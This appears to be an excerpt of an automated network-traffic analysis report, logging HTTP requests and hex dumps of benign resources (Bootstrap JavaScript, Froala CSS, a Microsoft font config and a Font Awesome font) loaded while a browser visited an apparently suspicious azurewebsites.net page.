                          2024-05-24 23:00:31 UTC1369INData Raw: 6c 3a 22 28 6e 75 6d 62 65 72 7c 62 6f 6f 6c 65 61 6e 29 22 2c 6b 65 79 62 6f 61 72 64 3a 22 62 6f 6f 6c 65 61 6e 22 2c 73 6c 69 64 65 3a 22 28 62 6f 6f 6c 65 61 6e 7c 73 74 72 69 6e 67 29 22 2c 70 61 75 73 65 3a 22 28 73 74 72 69 6e 67 7c 62 6f 6f 6c 65 61 6e 29 22 2c 77 72 61 70 3a 22 62 6f 6f 6c 65 61 6e 22 2c 74 6f 75 63 68 3a 22 62 6f 6f 6c 65 61 6e 22 7d 2c 76 3d 7b 54 4f 55 43 48 3a 22 74 6f 75 63 68 22 2c 50 45 4e 3a 22 70 65 6e 22 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 74 68 69 73 2e 5f 69 74 65 6d 73 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64
                          Data Ascii: l:"(number|boolean)",keyboard:"boolean",slide:"(boolean|string)",pause:"(string|boolean)",wrap:"boolean",touch:"boolean"},v={TOUCH:"touch",PEN:"pen"},b=function(){function t(t,e){this._items=null,this._interval=null,this._activeElement=null,this._isPaused
                          2024-05-24 23:00:31 UTC1369INData Raw: 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 6e 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 69 76 65 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 22 29 3b 76 61 72 20 69 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 29 3b 69 66 28 21 28 74 3e 74 68 69 73 2e 5f 69 74 65 6d 73 2e 6c 65 6e 67 74 68 2d 31 7c 7c 74 3c 30 29 29 69 66 28 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 29 65
                          Data Ascii: isible:this.next).bind(this),this._config.interval))},n.to=function(t){var n=this;this._activeElement=this._element.querySelector(".active.carousel-item");var i=this._getItemIndex(this._activeElement);if(!(t>this._items.length-1||t<0))if(this._isSliding)e
                          2024-05-24 23:00:31 UTC1369INData Raw: 65 29 7b 74 2e 5f 70 6f 69 6e 74 65 72 45 76 65 6e 74 26 26 76 5b 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 70 6f 69 6e 74 65 72 54 79 70 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 3f 74 2e 74 6f 75 63 68 53 74 61 72 74 58 3d 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 63 6c 69 65 6e 74 58 3a 74 2e 5f 70 6f 69 6e 74 65 72 45 76 65 6e 74 7c 7c 28 74 2e 74 6f 75 63 68 53 74 61 72 74 58 3d 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 74 6f 75 63 68 65 73 5b 30 5d 2e 63 6c 69 65 6e 74 58 29 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 2e 5f 70 6f 69 6e 74 65 72 45 76 65 6e 74 26 26 76 5b 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 70 6f 69 6e 74 65 72 54 79 70 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 26 26 28 74 2e 74 6f 75
                          Data Ascii: e){t._pointerEvent&&v[e.originalEvent.pointerType.toUpperCase()]?t.touchStartX=e.originalEvent.clientX:t._pointerEvent||(t.touchStartX=e.originalEvent.touches[0].clientX)},i=function(e){t._pointerEvent&&v[e.originalEvent.pointerType.toUpperCase()]&&(t.tou
                          2024-05-24 23:00:31 UTC1369INData Raw: 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 22 29 29 3a 5b 5d 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 74 29 7d 2c 6e 2e 5f 67 65 74 49 74 65 6d 42 79 44 69 72 65 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 22 6e 65 78 74 22 3d 3d 3d 74 2c 69 3d 22 70 72 65 76 22 3d 3d 3d 74 2c 6f 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 65 29 2c 73 3d 74 68 69 73 2e 5f 69 74 65 6d 73 2e 6c 65 6e 67
                          Data Ascii: ItemIndex=function(t){return this._items=t&&t.parentNode?[].slice.call(t.parentNode.querySelectorAll(".carousel-item")):[],this._items.indexOf(t)},n._getItemByDirection=function(t,e){var n="next"===t,i="prev"===t,o=this._getItemIndex(e),s=this._items.leng


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.649716104.17.24.144432064C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-24 23:00:31 UTC617OUTGET /ajax/libs/froala-editor/2.8.5/css/froala_style.min.css HTTP/1.1
                          Host: cdnjs.cloudflare.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: text/css,*/*;q=0.1
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: style
                          Referer: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-24 23:00:31 UTC932INHTTP/1.1 200 OK
                          Date: Fri, 24 May 2024 23:00:31 GMT
                          Content-Type: text/css; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=30672000
                          ETag: W/"5eb03e6a-1c28"
                          Last-Modified: Mon, 04 May 2020 16:10:18 GMT
                          cf-cdnjs-via: cfworker/kv
                          Cross-Origin-Resource-Policy: cross-origin
                          Timing-Allow-Origin: *
                          X-Content-Type-Options: nosniff
                          CF-Cache-Status: MISS
                          Expires: Wed, 14 May 2025 23:00:31 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d4jjf2D9%2BJrr8lp2dab928m0aegegnMyjXLQFtIJXcCIXTAouonAGmte1V0LgtP21R%2BzfAqv3ekaZDxKUrAN5yaqF3dKNYrlj4m6BEimZTdZLJ1CqUwpD99MLsfua%2B8U0wanKlKa"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                          Strict-Transport-Security: max-age=15780000
                          Server: cloudflare
                          CF-RAY: 8890e6ff7ce680dc-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-24 23:00:31 UTC437INData Raw: 31 63 32 38 0d 0a 2f 2a 21 0a 20 2a 20 66 72 6f 61 6c 61 5f 65 64 69 74 6f 72 20 76 32 2e 38 2e 35 20 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 72 6f 61 6c 61 2e 63 6f 6d 2f 77 79 73 69 77 79 67 2d 65 64 69 74 6f 72 29 0a 20 2a 20 4c 69 63 65 6e 73 65 20 68 74 74 70 73 3a 2f 2f 66 72 6f 61 6c 61 2e 63 6f 6d 2f 77 79 73 69 77 79 67 2d 65 64 69 74 6f 72 2f 74 65 72 6d 73 2f 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 34 2d 32 30 31 38 20 46 72 6f 61 6c 61 20 4c 61 62 73 0a 20 2a 2f 0a 0a 2e 63 6c 65 61 72 66 69 78 3a 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 68 65 69 67 68 74 3a 30 7d 2e 68 69 64 65 2d 62 79 2d 63 6c 69 70 70 69 6e 67 7b 70 6f 73 69 74 69 6f 6e 3a
                          Data Ascii: 1c28/*! * froala_editor v2.8.5 (https://www.froala.com/wysiwyg-editor) * License https://froala.com/wysiwyg-editor/terms/ * Copyright 2014-2018 Froala Labs */.clearfix::after{clear:both;display:block;content:"";height:0}.hide-by-clipping{position:
                          2024-05-24 23:00:31 UTC1369INData Raw: 70 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 2d 6d 6f 7a 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 70 61 64 64 69 6e 67 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 70 61 64 64 69 6e 67 2d 62 6f 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 70 61 64 64 69 6e 67 2d 62 6f 78 7d 69 6d 67 2e 66 72 2d 62 6f 72 64 65 72 65 64 2c 2e 66 72 2d 69 6d 67 2d 63 61 70 74 69 6f 6e 2e 66 72 2d 62 6f 72 64 65 72 65 64 20 69 6d 67 7b 62 6f 72 64 65 72 3a 73 6f 6c 69 64 20 35 70 78 20 23 43 43 43 7d 69 6d 67 2e 66 72 2d 62 6f 72 64 65 72 65 64 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67
                          Data Ascii: px;-webkit-border-radius:10px;-moz-background-clip:padding;-webkit-background-clip:padding-box;background-clip:padding-box}img.fr-bordered,.fr-img-caption.fr-bordered img{border:solid 5px #CCC}img.fr-bordered{-webkit-box-sizing:content-box;-moz-box-sizing
                          2024-05-24 23:00:31 UTC1369INData Raw: 65 77 20 68 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6f 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6b 68 74 6d 6c 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 70 61 67 65 2d 62 72 65 61 6b 2d 61 66 74 65 72 3a 61 6c 77 61 79 73 7d 2e 66 72 2d 76 69 65 77 20 2e 66 72 2d 66 69 6c 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 66 72 2d 76 69 65 77 20 2e 66 72 2d 66 69 6c 65 3a 3a 61 66 74 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6e 74 65 6e
                          Data Ascii: ew hr{clear:both;user-select:none;-o-user-select:none;-moz-user-select:none;-khtml-user-select:none;-webkit-user-select:none;-ms-user-select:none;page-break-after:always}.fr-view .fr-file{position:relative}.fr-view .fr-file::after{position:relative;conten
                          2024-05-24 23:00:31 UTC1369INData Raw: 3a 73 6f 6c 69 64 20 31 70 78 20 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 7d 2e 66 72 2d 76 69 65 77 20 2e 66 72 2d 74 65 78 74 2d 73 70 61 63 65 64 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 31 70 78 7d 2e 66 72 2d 76 69 65 77 20 2e 66 72 2d 74 65 78 74 2d 75 70 70 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 66 72 2d 76 69 65 77 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 72 2d 76 69 65 77 20 69 6d 67 2e 66 72 2d 64 69 62 7b 6d 61 72 67 69 6e 3a 35 70 78 20 61 75 74 6f 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e
                          Data Ascii: :solid 1px #222;padding:10px 0}.fr-view .fr-text-spaced{letter-spacing:1px}.fr-view .fr-text-uppercase{text-transform:uppercase}.fr-view img{position:relative;max-width:100%}.fr-view img.fr-dib{margin:5px auto;display:block;float:none;vertical-align:top}.
                          2024-05-24 23:00:31 UTC1369INData Raw: 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 66 72 2d 76 69 65 77 20 2e 66 72 2d 76 69 64 65 6f 3e 2a 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 62 6f 72 64 65 72 3a 30 7d 2e 66 72 2d 76 69 65 77 20 2e 66 72 2d 76 69 64 65 6f 2e 66 72 2d 64 76 62 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 66 72 2d 76 69 65 77 20 2e 66 72 2d 76 69 64 65 6f 2e 66 72 2d 64 76 62 2e 66 72 2d 66 76 6c 7b 74 65 78 74 2d 61 6c 69
                          Data Ascii: text-align:center;position:relative}.fr-view .fr-video>*{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;max-width:100%;border:0}.fr-view .fr-video.fr-dvb{display:block;clear:both}.fr-view .fr-video.fr-dvb.fr-fvl{text-ali
                          2024-05-24 23:00:31 UTC1303INData Raw: 61 2e 66 72 2d 6c 61 72 67 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 7d 61 2e 66 72 2d 76 69 65 77 2e 66 72 2d 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 61 2e 66 72 2d 76 69 65 77 2e 66 72 2d 67 72 65 65 6e 7b 63 6f 6c 6f 72 3a 67 72 65 65 6e 7d 69 6d 67 2e 66 72 2d 76 69 65 77 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 69 6d 67 2e 66 72 2d 76 69 65 77 2e 66 72 2d 64 69 62 7b 6d 61 72 67 69 6e 3a 35 70 78 20 61 75 74 6f 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 69 6d 67 2e 66 72 2d 76 69 65 77 2e 66 72 2d 64 69 62 2e 66 72 2d 66 69 6c 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a
                          Data Ascii: a.fr-large{font-size:24px}a.fr-view.fr-strong{font-weight:700}a.fr-view.fr-green{color:green}img.fr-view{position:relative;max-width:100%}img.fr-view.fr-dib{margin:5px auto;display:block;float:none;vertical-align:top}img.fr-view.fr-dib.fr-fil{margin-left:
                          2024-05-24 23:00:31 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.649721184.28.90.27443
                          TimestampBytes transferredDirectionData
                          2024-05-24 23:00:33 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                          2024-05-24 23:00:33 UTC467INHTTP/1.1 200 OK
                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                          Content-Type: application/octet-stream
                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                          Server: ECAcc (lpl/EF06)
                          X-CID: 11
                          X-Ms-ApiVersion: Distribute 1.2
                          X-Ms-Region: prod-eus-z1
                          Cache-Control: public, max-age=148181
                          Date: Fri, 24 May 2024 23:00:33 GMT
                          Connection: close
                          X-CID: 2


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.649731184.28.90.27443
                          TimestampBytes transferredDirectionData
                          2024-05-24 23:00:34 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                          Range: bytes=0-2147483646
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                          2024-05-24 23:00:34 UTC515INHTTP/1.1 200 OK
                          ApiVersion: Distribute 1.1
                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                          Content-Type: application/octet-stream
                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                          Server: ECAcc (lpl/EF06)
                          X-CID: 11
                          X-Ms-ApiVersion: Distribute 1.2
                          X-Ms-Region: prod-weu-z1
                          Cache-Control: public, max-age=148116
                          Date: Fri, 24 May 2024 23:00:34 GMT
                          Content-Length: 55
                          Connection: close
                          X-CID: 2
                          2024-05-24 23:00:34 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.649782104.18.11.2074432064C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-24 23:00:50 UTC689OUTGET /font-awesome/4.5.0/fonts/fontawesome-webfont.woff2?v=4.5.0 HTTP/1.1
                          Host: maxcdn.bootstrapcdn.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: font
                          Referer: https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-24 23:00:51 UTC911INHTTP/1.1 200 OK
                          Date: Fri, 24 May 2024 23:00:50 GMT
                          Content-Type: font/woff2
                          Content-Length: 66624
                          Connection: close
                          CDN-PullZone: 252412
                          CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                          CDN-RequestCountryCode: US
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=31919000
                          ETag: "db812d8a70a4e88e888744c1c9a27e89"
                          Last-Modified: Mon, 25 Jan 2021 22:04:54 GMT
                          CDN-ProxyVer: 1.04
                          CDN-RequestPullSuccess: True
                          CDN-RequestPullCode: 200
                          CDN-CachedAt: 03/16/2024 16:07:50
                          CDN-EdgeStorageId: 1067
                          timing-allow-origin: *
                          cross-origin-resource-policy: cross-origin
                          X-Content-Type-Options: nosniff
                          CDN-Status: 200
                          CDN-RequestId: a5fabe82ab89a3f0d70b0aa54235bae4
                          CDN-Cache: HIT
                          CF-Cache-Status: HIT
                          Age: 300671
                          Accept-Ranges: bytes
                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                          Server: cloudflare
                          CF-RAY: 8890e77a6ff25e86-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-24 23:00:51 UTC458INData Raw: 77 4f 46 32 00 01 00 00 00 01 04 40 00 0e 00 00 00 02 2a e8 00 01 03 e0 00 04 01 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 20 06 60 00 85 72 11 08 0a 87 f6 1c 86 b0 35 01 36 02 24 03 94 0a 0b 8a 10 00 04 20 05 87 08 07 b0 20 3f 77 65 62 66 06 5b fc c1 91 80 d6 40 d6 8c 17 e5 a6 6e 43 80 c7 cb 9c e5 74 01 54 4c b7 c9 a1 f4 66 05 88 d6 74 1d a1 c8 c8 b0 71 00 c6 e8 a9 35 fb ff ff ff 3f 3d 69 88 6c e5 d2 91 5c db 76 6c 20 82 03 54 ff 83 ec 90 62 16 d2 15 d9 20 f4 31 07 66 c3 ba 9e 37 d4 54 87 51 d3 0a 8a 82 44 13 3b 3a bf d0 ae 12 31 95 6c d7 be 6a 76 88 af 65 d2 07 ec d2 6e 93 0f 45 89 a8 07 df a0 6b 35 3e ef a3 64 0f 37 51 a9 6c 8a 7f 42 61 94 dc 0a 92 75 e2 78 5d 2e f9 85 8b d6 f9 c0 57 92 43 b5 86 91 c8 24 ae 38
                          Data Ascii: wOF2@*?FFTM `r56$ ?webf[@nCtTLftq5?=il\vl Tb 1f7TQD;:1ljvenEk5>d7QlBaux].WC$8
                          2024-05-24 23:00:51 UTC1369INData Raw: 31 60 08 8c 51 23 6a 8c 1e ec 2f 92 5a 30 a2 b6 11 2d 95 c2 46 95 12 69 81 62 05 46 22 32 cf 3c 45 45 c5 a8 13 ed 3b eb f4 22 75 3f d1 9c fd db d9 dd 14 0e 1a 82 d4 52 d9 81 5a ea 48 52 b1 1d 44 d3 fb b7 78 aa 59 2c 0d 35 82 54 74 a6 76 62 14 aa 9c 65 cf bc e6 59 4e 7f eb a9 73 46 4e 44 2b 03 ff fa f3 b7 f6 f4 b6 ef b7 31 08 09 08 87 95 18 cf a4 60 80 b6 d9 01 da 44 0b 28 92 26 36 62 61 50 36 28 a0 80 d5 18 11 58 b3 36 67 4e 57 c6 36 6b 2e d5 39 5d ba a8 76 1d 1f eb a1 9a ea ff ac 24 43 66 b4 76 c0 76 fa 10 78 40 10 b0 2d 4a b8 60 47 b0 97 d9 77 d4 fe 77 5b 10 d8 41 83 c0 14 13 04 b8 e5 34 03 6d 73 49 3e 00 c5 ff cf 69 ef d9 cf 13 f3 18 1e 70 05 c3 80 46 28 32 62 b5 bb da 18 7e 48 c9 5d 4a 95 5d 94 b1 6a dd b9 ad dc d4 46 cd 66 2d 7e 0b 40 fc c7 f3 c5 1a
                          Data Ascii: 1`Q#j/Z0-FibF"2<EE;"u?RZHRDxY,5TtvbeYNsFND+1`D(&6baP6(X6gNW6k.9]v$Cfvvx@-J`Gww[A4msI>ipF(2b~H]J]jFf-~@
                          2024-05-24 23:00:51 UTC1369INData Raw: ec a5 e6 3a f7 de ca 6c c9 a1 1d 75 26 41 27 fb 46 00 47 b8 fd 93 63 15 54 35 3a c6 8a 60 71 52 aa c6 4f c9 89 ad de 90 ec 55 0e 51 c3 d4 b1 e5 d9 5e 28 08 e6 ec 9c 54 c3 56 61 03 c6 6d bf 89 35 90 a4 76 b3 ec 50 1d 25 d4 5e 29 4a 11 89 15 2c 66 2b e9 52 1a 4a 46 b2 b9 2c ca f0 80 cc 9c f1 d3 a1 d4 fe cc ae 14 41 ac d5 78 08 01 28 0c ad 48 9e 8c 8f b7 7d cb 5c 89 e1 c7 c2 69 05 83 8b 0d 86 16 22 1c 82 07 18 13 f1 6c e1 ca 44 6f bb 50 d5 24 e3 d4 44 af 11 e8 7d 11 15 5c a8 8b b0 5a 28 69 31 c7 25 87 84 d7 77 65 1a 36 41 d2 d5 95 bc 07 ac 8d 4a 5d 16 4d 34 65 b4 88 20 c3 67 b8 92 c4 c8 e5 62 f1 94 3e 6a 40 91 14 a6 dc 65 55 77 0a 75 a7 4e ea 53 33 15 40 7d 08 a2 b7 33 41 ee 99 58 c3 ca 3f 64 b5 9b 7a ac 38 69 1e 14 43 2f d5 c1 c9 9b c4 00 e5 4a 4b 45 00 af
                          Data Ascii: :lu&A'FGcT5:`qROUQ^(TVam5vP%^)J,f+RJF,Ax(H}\i"lDoP$D}\Z(i1%we6AJ]M4e gb>j@eUwuNS3@}3AX?dz8iC/JKE
                          2024-05-24 23:00:51 UTC1369INData Raw: bd 02 fb 96 57 6d c1 ba 0a 6a a6 c3 0b 31 15 81 12 21 b0 aa 32 fa 17 ad 48 27 3a d6 49 1a 5f 66 15 ca 2c d5 43 03 62 a4 01 99 9a 6a a3 41 5c a3 ce 88 b2 f5 4c e1 94 af 31 20 29 d9 c8 48 92 b9 02 61 98 99 15 b6 09 82 3d ae eb 9d e9 4e 28 55 c9 3b 0e 9b b8 b3 71 b0 be 9e 95 f5 6c 71 e3 ce e1 d1 92 64 3b 68 b0 db d1 33 60 67 07 ac 6b 7a 10 8e 22 ad 25 e5 85 d6 e7 bc cb 28 ec f3 38 fd 02 90 58 58 d0 8c cc 4a 6b 05 5f af 77 b3 6f 5d d3 9e a4 1e 20 0f 02 bc b7 1a 4a e9 38 61 34 da 36 a4 26 d7 30 33 33 3d d5 06 05 39 9e 05 29 ca 76 cc 9e ae f5 be 26 d2 da cd 4a 50 56 de fd cc 1a cb a2 30 fa db 5c 98 71 ac 24 ae b6 a9 48 ea e9 59 10 88 31 69 b6 be 39 ff 1e 2f 99 69 a3 7d ab b7 34 2c 7f 72 a4 d3 70 d5 bb 80 a6 72 cd 57 c7 75 62 cf 15 88 f9 69 dc 9d 13 b3 46 b7 23
                          Data Ascii: Wmj1!2H':I_f,CbjA\L1 )Ha=N(U;qlqd;h3`gkz"%(8XXJk_wo] J8a46&033=9)v&JPV0\q$HY1i9/i}4,rprWubiF#
                          2024-05-24 23:00:51 UTC1369INData Raw: e3 a1 f6 ba 78 e6 9c b9 ab 10 5b 93 c4 ae 6c 5c 67 85 05 66 77 94 50 4b 7c a3 72 10 af 9e 28 30 dc c3 4a 23 23 72 50 b9 3c b5 2e b7 c1 3d 24 a8 8c 56 0a f3 d3 ad 7d 6b aa 80 cd 0a 22 6c 57 c1 6d 94 74 76 2e 14 1a f5 e6 95 41 37 e6 ec 2d c8 5f 08 e2 68 a4 50 ad e0 f5 2c a7 75 65 09 2d 7c b1 3a 89 f8 78 16 a9 6b d9 56 4f e2 6e 2f d7 65 70 5d 13 de 1d 5e 1c f2 df 74 b2 8f 32 09 9d 6e 28 7c 99 72 a5 08 47 3c 06 04 80 db 72 ca 78 f2 34 d3 20 ce aa 02 ca a1 68 24 81 e8 e0 44 b1 a4 b8 94 17 a9 ff eb 49 e1 f9 ed 50 31 87 52 75 a9 6e 36 cd 8f de 3c 5b 78 f8 38 52 77 8a 71 19 e3 e3 74 51 49 9c a4 9e 61 20 0a be 32 c2 5f 55 fb 5a 98 93 89 24 ee 56 20 98 f1 1e 5e 58 47 72 e7 0e 03 3d 0b 98 9e 77 9c 44 df 75 4a 7a b0 01 da 1c 6b 33 bb ac 9c 50 45 00 76 ae 60 9e 8b 2e
                          Data Ascii: x[l\gfwPK|r(0J##rP<.=$V}k"lWmtv.A7-_hP,ue-|:xkVOn/ep]^t2n(|rG<rx4 h$DIP1Run6<[x8RwqtQIa 2_UZ$V ^XGr=wDuJzk3PEv`.
